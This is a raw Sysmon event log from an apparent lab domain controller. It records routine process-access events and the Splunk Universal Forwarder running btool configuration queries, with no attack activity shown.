13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007063Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007062Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007061Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007060Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007059Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007058Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007057Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007056Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85E8-5FCF-1A01-000000009101}5060C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007055Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007054Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-85E8-5FCF-1901-000000009101}30763164C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-85E8-5FCF-1A01-000000009101}5060C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007053Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.751{10ACEC4A-85E8-5FCF-1A01-000000009101}5060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-85E8-5FCF-1901-000000009101}3076C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list httpServerListener: --no-log 10341000x80000000000000007052Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E8-5FCF-1901-000000009101}3076C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007051Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007050Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007049Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007048Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007047Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007046Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007045Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007044Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007043Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007042Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85E8-5FCF-1901-000000009101}3076C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007041Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.731{10ACEC4A-85E8-5FCF-1801-000000009101}8762908C:\Windows\system32\cmd.exe{10ACEC4A-85E8-5FCF-1901-000000009101}3076C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007040Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.746{10ACEC4A-85E8-5FCF-1901-000000009101}3076C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-85E8-5FCF-1801-000000009101}876C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list httpServerListener: --no-log 10341000x80000000000000007039Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.731{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E8-5FCF-1801-000000009101}876C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007038Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.731{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007037Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 